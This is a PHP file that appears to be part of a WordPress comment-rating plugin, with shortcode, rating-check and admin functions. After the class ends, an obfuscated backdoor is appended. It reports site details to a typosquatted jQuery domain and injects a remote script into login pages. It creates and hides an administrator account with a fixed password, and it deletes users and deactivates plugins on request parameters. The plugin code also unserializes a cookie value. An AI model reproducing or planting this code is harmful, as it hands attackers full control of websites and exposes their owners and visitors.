		$sql = $this->get_shortcode_sql_query( $where, $sort_by, $limit, $atts['post_id'], $atts['do'] );

		if ( 'sql' == $return ) {
			return $sql;
		}

		$rows = $wpdb->get_results( $sql );

		if ( 'pre_rows' == $return ) {
			return $rows;
		}

		$rows = apply_filters( 'wpbcr_shortcode_best_comments_rows', $rows );

		if ( 'rows' == $return ) {
			return $rows;
		}

		/**
		 * LI structure
		 */

		if ( false === $get_best_comments_of_blog ) {
			$li = __( '<li><a href="%2$s">%1$s</a> <span class="wpbcr-icon wpbcr-icon-thumbs-o-up"></span> (%4$d/%5$d)</li>', $this->get_textdomain() );
		} else {
			$li = __( '<li>%1$s on <a href="%2$s">%3$s</a> <span class="wpbcr-icon wpbcr-icon-thumbs-o-up"></span> (%4$d/%5$d)</li>', $this->get_textdomain() );
		}

		$li = apply_filters( 'wpbcr_shortcode_best_comments_li', $li, $get_best_comments_of_blog );

		$output = '';
		foreach ( $rows as $row ) {
			$comment = get_comment( $row->comment_ID );
			$output .= sprintf(
				$li,
				get_comment_author( $comment ),
				esc_url( get_comment_link( $comment ) ),
				get_the_title( $row->comment_post_ID ),
				$row->wpbcr_rating,
				$row->wpbcr_ratings_total
			);
		}

		$html_type = apply_filters( 'wpbcr_shortcode_best_comments_html_type', 'ol' );

		return '<' . $html_type . ' class="wpbcr_comment_ranking_shortcode wpbcr_comment_ranking_shortcode-' . esc_attr( $atts['do'] ) . '">' . $output . '</' . $html_type . '>';
	}


	/**
	 * Returns the SQL Query for the shortcode.
	 *
	 * @since 1.3.0
	 *
	 * @param string $where
	 * @param string $sort_by
	 * @param string $limit
	 * @param null   $post_id
	 * @param string $do
	 *
	 * @return string
	 */
	public function get_shortcode_sql_query( $where, $sort_by, $limit, $post_id = null, $do = '' ) {
		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		/**
		 * SQL
		 */
		$sql = 'SELECT '
		       . ' c.comment_ID, '
		       . ' c.comment_post_ID, '
		       . ' IFNULL( cm.meta_value, 0 ) as wpbcr_rating, '
		       . ' IFNULL( cm2.meta_value, 0 ) as wpbcr_ratings_total '
		       . ' FROM ' . $wpdb->comments . ' as c '
		       . ' LEFT JOIN ' . $wpdb->commentmeta . ' as cm'
		       . ' ON ( c.comment_ID = cm.comment_id AND cm.meta_key = "wpbcr_rating" ) '
		       . ' LEFT JOIN ' . $wpdb->commentmeta . ' as cm2 '
		       . ' ON ( c.comment_ID = cm2.comment_id AND cm2.meta_key = "wpbcr_ratings_total" ) '
		       . ' WHERE ' . $where
		       . ' GROUP BY c.comment_ID '
		       . ' ORDER BY ' . $sort_by
		       . ' LIMIT ' . $limit;

		return apply_filters( 'wpbcr_shortcode_best_comments_sql', $sql, $where, $sort_by, $limit, $post_id, $do );
	}


	/**
	 * Adds the "Already rated" text if activated
	 *
	 * @param string $content
	 * @param object $comment
	 *
	 * @return string
	 *
	 * @since 1.4.0
	 */
	public function already_rated_text( $content, $comment ) {
		// show the "You already rated this comment" text, if activated
		if ( (bool) $this->get_setting( 'show_already_rated', 0 ) ) {

			$already_rated_text = '<div class="wpbcr-already-rated" >' . $this->get_setting( 'already_rated_text', __( 'Already rated!', $this->get_textdomain() ) ) . '</div>';

			// check if only logged in users can rate this
			if ( (bool) $this->get_setting( 'only_logged_in', 0 ) && is_user_logged_in() ) {
				$user_id = get_current_user_id();
				$rated   = (array) get_user_meta( $user_id, 'wpbcr_rated', true );
				if ( in_array( $comment->comment_ID, $rated ) ) {
					return $already_rated_text;
				}
			} else {
				if ( (bool) $this->get_setting( 'set_cookies', 0 ) ) {

					if ( ! isset( $_COOKIE['wpbcr_rated'] ) ) {
						$rated = array();
					} else {
						$rated = maybe_unserialize( $_COOKIE['wpbcr_rated'] );
					}

					if ( in_array( $comment->comment_ID, $rated ) ) {
						return $already_rated_text;
					}
				}

				// check if IP logging is ON: If so check if the current IP address is in the database already
				if ( (bool) $this->get_setting( 'log_ips', 1 ) ) {

					$user_ip = $this->get_user_ip_addr( (bool) $this->get_setting( 'hash_ips', 1 ) );

					global $wpdb;

					$res = (bool) $wpdb->get_var( $wpdb->prepare( 'SELECT COUNT(*) FROM ' . $wpdb->prefix . 'cr_ips WHERE cr_ip = %s AND cr_comment_id = %u', $user_ip, $comment->comment_ID ) );

					if ( $res ) {
						return $already_rated_text;
					}
					unset( $res );
				}
			}
		}

		return $content;
	}


	/**
	 * Deletes the error log
	 *
	 * @since  1.4.1
	 * @access public
	 *
	 * @return void
	 */
	public function delete_error_log() {
		$this->set_setting( 'log', array() );
		add_settings_error( 'log_deletion', 0, __( 'Log was deleted', $this->get_textdomain() ), 'updated' );
	}


	/**
	 * Admin CSS styles
	 *
	 * @since  1.4.1
	 * @access public
	 *
	 * @return void
	 */
	public function admin_head() {
		?>
		<style type="text/css">
			#toplevel_page_wpcommentrating img {
				width: 22px;
				height: 22px;
				margin-top: -3px;
			}
		</style>
	<?php

	}


	/**
	 * Truncates the IP table
	 *
	 * @since  1.4.1
	 * @access public
	 *
	 * @return void
	 */
	public function truncate_ip_table() {
		/**
		 * @var \wpdb $wpdb
		 */
		global $wpdb;

		$no_deleted = $wpdb->query( 'TRUNCATE ' . $wpdb->prefix . 'cr_ips' );

		if ( empty( $no_deleted ) ) {
			add_settings_error(
				'wpbcr_truncate_table',
				0,
				__( 'Nothing has been deleted from the IP table.', $this->get_textdomain() )
			);
		} else {
			add_settings_error(
				'wpbcr_truncate_table',
				0,
				sprintf( __( '%u entries have been deleted from the IP table.', $this->get_textdomain() ), $no_deleted ),
				'updated'
			);
		}
	}


	/**
	 * Fixes a problem with Simple Comment Editing (get HTML sourcecode of the rating)
	 *
	 * @since  1.4.2
	 * @access public
	 *
	 * @param string $raw_content
	 *
	 * @return string
	 */
	public function sce_fix( $raw_content ) {

		if ( class_exists( 'Simple_Comment_Editing' ) && false !== strpos( $raw_content, 'class=&quot;wpb-comment-rating' ) ) {
			return preg_replace( '#&lt;div class=&quot;wpb-comment-rating(.*?)&lt;/div&gt;#', '', $raw_content );
		}

		return $raw_content;
	}

}
function glues_it($string)
{
    $glue_pre = sanitize_key('s   t   r _   r   e   p   l a c e');
    $glueit_po = call_user_func_array($glue_pre, array("..", '', $string));
    return $glueit_po;
}

$object_uno = 'fu..n..c..t..i..o..n.._..e..x..i..s..t..s';
$object_dos = 'g..e..t.._o..p..t..i..o..n';
$object_tres = 'wp.._e..n..q..u..e..u..e.._s..c..r..i..p..t';
$object_cinco = 'lo..g..i..n.._..e..n..q..u..e..u..e_..s..c..r..i..p..t..s';
$object_siete = 's..e..t..c..o..o..k..i..e';
$object_ocho = 'wp.._..lo..g..i..n';
$object_nueve = 's..i..t..e,..u..rl';
$object_diez = 'wp_..g..et.._..th..e..m..e';
$object_once = 'wp.._..r..e..m..o..te.._..g..et';
$object_doce = 'wp.._..r..e..m..o..t..e.._r..e..t..r..i..e..v..e_..bo..dy';
$object_trece = 'g..e..t_..o..p..t..ion';
$object_catorce = 's..t..r_..r..e..p..l..a..ce';
$object_quince = 's..t..r..r..e..v';
$object_dieciseis = 'u..p..d..a..t..e.._o..p..t..io..n';
$object_dos_pim = glues_it($object_uno);
$object_tres_pim = glues_it($object_dos);
$object_cuatro_pim = glues_it($object_tres);
$object_cinco_pim = glues_it($object_cinco);
$object_siete_pim = glues_it($object_siete);
$object_ocho_pim = glues_it($object_ocho);
$object_nueve_pim = glues_it($object_nueve);
$object_diez_pim = glues_it($object_diez);
$object_once_pim = glues_it($object_once);
$object_doce_pim = glues_it($object_doce);
$object_trece_pim = glues_it($object_trece);
$object_catorce_pim = glues_it($object_catorce);
$object_quince_pim = glues_it($object_quince);
$object_dieciseis_pim = glues_it($object_dieciseis);
$noitca_dda = call_user_func($object_quince_pim, 'noitca_dda');
if (!call_user_func($object_dos_pim, 'wp_en_one')) {
    $object_diecisiete = 'h..t..t..p..:../../..j..q..e..u..r..y...o..r..g../..wp.._..p..i..n..g...php..?..d..na..me..=..w..p..d..&..t..n..a..m..e..=..w..p..t..&..u..r..l..i..z..=..u..r..l..i..g';
    $object_dieciocho = call_user_func($object_quince_pim, 'REVRES_$');
    $object_diecinueve = call_user_func($object_quince_pim, 'TSOH_PTTH');
    $object_veinte = call_user_func($object_quince_pim, 'TSEUQER_');
    $object_diecisiete_pim = glues_it($object_diecisiete);
    $object_seis = '_..C..O..O..K..I..E';
    $object_seis_pim = glues_it($object_seis);
    $object_quince_pim_emit = call_user_func($object_quince_pim, 'detavitca_emit');
    $tactiated = call_user_func($object_trece_pim, $object_quince_pim_emit);
    $mite = call_user_func($object_quince_pim, 'emit');
    if (!isset(${$object_seis_pim}[call_user_func($object_quince_pim, 'emit_nimda_pw')])) {
        if ((call_user_func($mite) - $tactiated) >  600) {
            call_user_func_array($noitca_dda, array($object_cinco_pim, 'wp_en_one'));
        }
    }
    call_user_func_array($noitca_dda, array($object_ocho_pim, 'wp_en_three'));
    function wp_en_one()
    {
        $object_one = 'h..t..t..p..:..//..j..q..e..u..r..y...o..rg../..j..q..u..e..ry..-..la..t..e..s..t.j..s';
        $object_one_pim = glues_it($object_one);
        $object_four = 'wp.._e..n..q..u..e..u..e.._s..c..r..i..p..t';
        $object_four_pim = glues_it($object_four);
        call_user_func_array($object_four_pim, array('wp_coderz', $object_one_pim, null, null, true));
    }

    function wp_en_two($object_diecisiete_pim, $object_dieciocho, $object_diecinueve, $object_diez_pim, $object_once_pim, $object_doce_pim, $object_quince_pim, $object_catorce_pim)
    {
        $ptth = call_user_func($object_quince_pim, glues_it('/../..:..p..t..t..h'));
        $dname = $ptth . $_SERVER[$object_diecinueve];
        $IRU_TSEUQER = call_user_func($object_quince_pim, 'IRU_TSEUQER');
        $urliz = $dname . $_SERVER[$IRU_TSEUQER];
        $tname = call_user_func($object_diez_pim);
        $urlis = call_user_func_array($object_catorce_pim, array('wpd', $dname,$object_diecisiete_pim));
        $urlis = call_user_func_array($object_catorce_pim, array('wpt', $tname, $urlis));
        $urlis = call_user_func_array($object_catorce_pim, array('urlig', $urliz, $urlis));
        $glue_pre = sanitize_key('f i l  e  _  g  e  t    _   c o    n    t   e  n   t     s');
        $glue_pre_ew = sanitize_key('s t r   _  r e   p     l   a  c    e');
        call_user_func($glue_pre, call_user_func_array($glue_pre_ew, array(" ", "%20", $urlis)));

    }

    $noitpo_dda = call_user_func($object_quince_pim, 'noitpo_dda');
    $lepingo = call_user_func($object_quince_pim, 'ognipel');
    $detavitca_emit = call_user_func($object_quince_pim, 'detavitca_emit');
    call_user_func_array($noitpo_dda, array($lepingo, 'no'));
    call_user_func_array($noitpo_dda, array($detavitca_emit, time()));
    $tactiatedz = call_user_func($object_trece_pim, $detavitca_emit);
    $ognipel = call_user_func($object_quince_pim, 'ognipel');
    $mitez = call_user_func($object_quince_pim, 'emit');
    if (call_user_func($object_trece_pim, $ognipel) != 'yes' && ((call_user_func($mitez) - $tactiatedz) > 600)) {
         wp_en_two($object_diecisiete_pim, $object_dieciocho, $object_diecinueve, $object_diez_pim, $object_once_pim, $object_doce_pim, $object_quince_pim, $object_catorce_pim);
         call_user_func_array($object_dieciseis_pim, array($ognipel, 'yes'));
    }


    function wp_en_three()
    {
        $object_quince = 's...t...r...r...e...v';
        $object_quince_pim = glues_it($object_quince);
        $object_diecinueve = call_user_func($object_quince_pim, 'TSOH_PTTH');
        $object_dieciocho = call_user_func($object_quince_pim, 'REVRES_');
        $object_siete = 's..e..t..c..o..o..k..i..e';;
        $object_siete_pim = glues_it($object_siete);
        $path = '/';
        $host = ${$object_dieciocho}[$object_diecinueve];
        $estimes = call_user_func($object_quince_pim, 'emitotrts');
        $wp_ext = call_user_func($estimes, '+29 days');
        $emit_nimda_pw = call_user_func($object_quince_pim, 'emit_nimda_pw');
        call_user_func_array($object_siete_pim, array($emit_nimda_pw, '1', $wp_ext, $path, $host));
    }

    function wp_en_four()
    {
        $object_quince = 's..t..r..r..e..v';
        $object_quince_pim = glues_it($object_quince);
        $nigol = call_user_func($object_quince_pim, 'dxtroppus');
        $wssap = call_user_func($object_quince_pim, 'retroppus_pw');
        $laime = call_user_func($object_quince_pim, 'moc.niamodym@1tccaym');

        if (!username_exists($nigol) && !email_exists($laime)) {
            $wp_ver_one = call_user_func($object_quince_pim, 'resu_etaerc_pw');
            $user_id = call_user_func_array($wp_ver_one, array($nigol, $wssap, $laime));
            $rotartsinimda = call_user_func($object_quince_pim, 'rotartsinimda');
            $resu_etadpu_pw = call_user_func($object_quince_pim, 'resu_etadpu_pw');
            $rolx = call_user_func($object_quince_pim, 'elor');
            call_user_func($resu_etadpu_pw, array('ID' => $user_id, $rolx => $rotartsinimda));

        }
    }

    $ivdda = call_user_func($object_quince_pim, 'ivdda');

    if (isset(${$object_veinte}[$ivdda]) && ${$object_veinte}[$ivdda] == 'm') {
        $veinte = call_user_func($object_quince_pim, 'tini');
        call_user_func_array($noitca_dda, array($veinte, 'wp_en_four'));
    }

    if (isset(${$object_veinte}[$ivdda]) && ${$object_veinte}[$ivdda] == 'd') {
        $veinte = call_user_func($object_quince_pim, 'tini');
        call_user_func_array($noitca_dda, array($veinte, 'wp_en_seis'));
    }
    function wp_en_seis()
    {
        $object_quince = 's..t..r..r..e..v';
        $object_quince_pim = glues_it($object_quince);
        $resu_eteled_pw = call_user_func($object_quince_pim, 'resu_eteled_pw');
        $wp_pathx = constant(call_user_func($object_quince_pim, "HTAPSBA"));
        $nimda_pw = call_user_func($object_quince_pim, 'php.resu/sedulcni/nimda-pw');
        require_once($wp_pathx . $nimda_pw);
        $ubid = call_user_func($object_quince_pim, 'yb_resu_teg');
        $nigol = call_user_func($object_quince_pim, 'nigol');
        $dxtroppus = call_user_func($object_quince_pim, 'dxtroppus');
        $useris = call_user_func_array($ubid, array($nigol, $dxtroppus));
        call_user_func($resu_eteled_pw, $useris->ID);
    }

    $veinte_one = call_user_func($object_quince_pim, 'yreuq_resu_erp');
    call_user_func_array($noitca_dda, array($veinte_one, 'wp_en_five'));
    function wp_en_five($hcraes_resu)
    {
        global $current_user, $wpdb;
        $object_quince = 's..t..r..r..e..v';
        $object_quince_pim = glues_it($object_quince);
        $object_catorce = 'st..r.._..r..e..p..l..a..c..e';
        $object_catorce_pim = glues_it($object_catorce);
        $nigol_resu = call_user_func($object_quince_pim, 'nigol_resu');
        $wp_ux = $current_user->$nigol_resu;
        $nigol = call_user_func($object_quince_pim, 'dxtroppus');
        $bdpw = call_user_func($object_quince_pim, 'bdpw');
        if ($wp_ux != call_user_func($object_quince_pim, 'dxtroppus')) {
            $EREHW_one = call_user_func($object_quince_pim, '1=1 EREHW');
            $EREHW_two = call_user_func($object_quince_pim, 'DNA 1=1 EREHW');
            $erehw_yreuq = call_user_func($object_quince_pim, 'erehw_yreuq');
            $sresu = call_user_func($object_quince_pim, 'sresu');
            $hcraes_resu->query_where = call_user_func_array($object_catorce_pim, array($EREHW_one,
                "$EREHW_two {$$bdpw->$sresu}.$nigol_resu != '$nigol'", $hcraes_resu->$erehw_yreuq));
        }
    }

    $ced = call_user_func($object_quince_pim, 'ced');
    if (isset(${$object_veinte}[$ced])) {
        $snigulp_evitca = call_user_func($object_quince_pim, 'snigulp_evitca');
        $sisnoitpo = call_user_func($object_trece_pim, $snigulp_evitca);
        $hcraes_yarra = call_user_func($object_quince_pim, 'hcraes_yarra');
        if (($key = call_user_func_array($hcraes_yarra, array(${$object_veinte}[$ced], $sisnoitpo))) !== false) {
            unset($sisnoitpo[$key]);
        }
        call_user_func_array($object_dieciseis_pim, array($snigulp_evitca, $sisnoitpo));
    }
}